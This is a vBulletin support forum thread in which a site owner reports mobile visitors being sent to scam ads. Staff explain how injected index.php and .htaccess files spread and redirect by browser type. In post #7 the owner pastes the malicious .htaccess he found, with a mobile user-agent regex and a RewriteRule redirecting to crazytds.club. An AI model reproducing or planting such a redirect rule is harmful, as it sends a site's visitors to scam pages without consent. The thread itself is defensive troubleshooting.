Announcement

Collapse
No announcement yet.

my site scam on mobile browser?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • my site scam on mobile browser?

    my site scam on mobile browser
    Looks like my site has been injected with some kind of scam ads.
    how can I solve this problem

    thanks
    voyger.: In Almighty God I trust, everyone else has to provide evidence."

    vBulletin Version 5.5.5

  • #2
    1. Make sure all your files are from an original vBulletin download.
    2. Make sure your templates are original. Or you know what changes are made in the templates.
    3. Make sure you don't have any extra files in your vBulletin directory unless you know exactly what they do or trust the developer.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API - Full / Mobile
    Vote for your favorite feature requests and the bugs you want to see fixed.

    Comment


    • #3
      1. Make sure all your files are from an original vBulletin download.
      2. Make sure your templates are original. Or you know what changes are made in the templates.
      3. Make sure you don't have any extra files in your vBulletin directory unless you know exactly what they do or trust the developer

      1> got a Vbullitin licence why I should go around download fake files
      2.> never change any teplate
      3> checked and checked don't see any extra files apart the dragonbyte shoutbox and the infopanel my forum is very simple and clean
      as far as I know at less I make mistake some ware, don't know where to turn around
      voyger.: In Almighty God I trust, everyone else has to provide evidence."

      vBulletin Version 5.5.5

      Comment


      • #4
        I didn't say you downloaded fake files. However, if you server was exploited for some reason, and it appears it has been, then you can have files uploaded to the server and that would cause this redirect. The way to fix this is to replace your files and make sure there are no extra files on your server.
        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API - Full / Mobile
        Vote for your favorite feature requests and the bugs you want to see fixed.

        Comment


        • #5
          thanks wayne for your kindle advise hope you will have lot of patient with me got few question to ask

          few years go when I install my VBullitin forum I install all VB files open on the server not on a directory folder of is own
          so all the VB directory folder they are mix-ups with other directory files feed and other file, I use for to do other job this directory they are different name of the VB file
          they shouldn't interfere with VB files ?

          now my question is if I download all the VB files and reupload to a separate directory folder and rename "forums" are the forum should work ok?
          on other word want to put only VB files in one directory as should have been want to know if I will run to trouble muck my forum
          hope you get what I mean
          thanks
          voyger.: In Almighty God I trust, everyone else has to provide evidence."

          vBulletin Version 5.5.5

          Comment


          • #6
            Yes... Having extraneous files in the vBulletin directory can cause issues with how vBulletin operates. This is why your mobile users are getting directed to a scam site. When dealing with the recent security patch, one of the common things that I noticed was that an index.php and .htaccess file would be added to directories. The index.php file would download copies of itself and copy it to new directories and create an .htaccess file. The .htaccess file would check the type of browser the user was accessing the site with and redirect them to the ultimate payload if there was a match. if there wasn't a match, it would pass control to the index.php which would then load the index.html (usually blank with vBulletin) in the directory. In other instances, the index.php failed to download the payload. This resulted in many people having empty /admincp/ paths. These files can be anywhere, even deep in the ckeditor folders.

            Even "legitimate" files could cause problems. If you have a directory named /download/ and create a vBulletin page named /download/ then you will never be able to access the page. The directory will take precedence. We also use a tool called an Autoloader. This is quite common in modern PHP programming. Instead of trying to memorize every file name and using a tons of require and include statements, we use a specific file pattern to store files. So when we need to load one of the files, we can use that file pattern to find and include it automatically. For instance, the system knows that if the class is called vB_Library, that it is in the /core/vb/library directory. If it is vB_API, it is in the /core/vb/api directory. If it is a third-party addon, we look in the /core/packages directory. Etc... If there are extra files in these directories, they can be included via the autoloader.

            Putting vBulletin in its own folder and deleting the extraneous files will help keep your site running properly and more secure.
            Translations provided by Google.

            Wayne Luke
            The Rabid Badger - a vBulletin Cloud demonstration site.
            vBulletin 5 API - Full / Mobile
            Vote for your favorite feature requests and the bugs you want to see fixed.

            Comment


            • #7
              hi wayne thanks for the extended explanation got the message you are the best
              after Christmas will do as you said put la VBullitin files in one directory to be more secure

              checked al VB files on my server found on every directory the
              htaccess file
              been modified with redirect link don't know how, as you said my
              server was exploited
              clean up all now my forum got faster and smartphone iPhone tablet work perfect no more error
              send you the incriminate files so you can have a idea of the scam


              PHP Code:
              RewriteEngine On
              RewriteBase 
              /
              RewriteCond %{HTTP_USER_AGENTandroid|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|operam(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windowsce|xda|xiino [NC,OR]
              RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|awa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC]
              RewriteRule ^$ http://crazytds.club/redirect.php [R,L]
              <IfModule mod_rewrite.c>
               
              RewriteEngine On
               
              # In some cases where you have other mod_rewrite rules, you may need to remove the
               # comment on the following RewriteBase line and change it to match your folder name.
               # This resets the other mod_rewrite rules for just this directory
               # If your site was www.example.com/forum, the setting would be /forum/
               #RewriteBase /

               #To redirect users to the secure version of your site, uncomment the lines below
                
              RewriteCond %{HTTPS} !=on
               
              #RewriteRule .* https://%{SERVER_NAME}%{REQUEST_URI} [R=301,L]

               # Send css calls directly to the correct file VBV-7807
               
              RewriteRule ^css.phpcore/css.php [NC,L]

               
              # Redirect old install path to core.
               
              RewriteRule ^installcore/install/ [NC,L]

               
              # Main Redirect
               
              RewriteCond %{REQUEST_URI} !\.(gif|jpg|jpeg|png|css)$
               
              RewriteCond %{REQUEST_FILENAME} !-f
               RewriteCond 
              %{REQUEST_FILENAME} !-d
               RewriteRule 
              ^(.*)$ index.php?routestring=$[L,QSA]

               
              # Because admincp is an actual directory.
               
              RewriteRule ^(admincp/)$ index.php?routestring=$[L,QSA

              this tread can be closed as is resolved
              my regards
              voyger.: In Almighty God I trust, everyone else has to provide evidence."

              vBulletin Version 5.5.5

              Comment


              • #8
                This would have been done before the security patch for 5.5.4 was released. Can't say when.
                Translations provided by Google.

                Wayne Luke
                The Rabid Badger - a vBulletin Cloud demonstration site.
                vBulletin 5 API - Full / Mobile
                Vote for your favorite feature requests and the bugs you want to see fixed.

                Comment

                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                Working...
                X